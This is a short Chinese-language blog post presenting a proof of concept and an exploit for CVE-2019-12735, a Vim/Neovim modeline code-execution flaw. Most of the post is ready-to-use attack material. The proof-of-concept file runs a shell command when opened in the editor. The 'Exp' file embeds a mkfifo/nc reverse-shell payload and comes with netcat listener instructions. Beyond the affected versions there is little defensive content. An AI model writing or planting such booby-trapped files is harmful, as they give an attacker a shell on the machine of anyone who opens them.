CVE-2019-12735:Linux Vim/Neovim编辑器任意代码执行漏洞

未分类 Admin 3个月前 (06-27) 134次浏览 0个评论

漏洞影响

影响范围:Vim < 8.1.1365, Neovim < 0.3.6

 

poc

1、创建poc.txt:

:!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="

2、确保modeline选项没有被禁用(:set modeline?)

返回modeline表示开启,

返回nomodeline表示已关闭

开启方式:在~/.vimrc(编辑或新建)下写入

set modeline

3、在vim中打开文件

$ vim poc.txt

4、系统就会自行uname -a.

 

Exp

root@iZuf6ek01e6gxvyxklk95nZ:~# cat shell.txt
:!rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 127.0.0.1  9999 >/tmp/f||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="

 

新开一个窗口监听

nc -lvp 9999

然后vim shell.txt

 

效果

 

 

喜欢 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址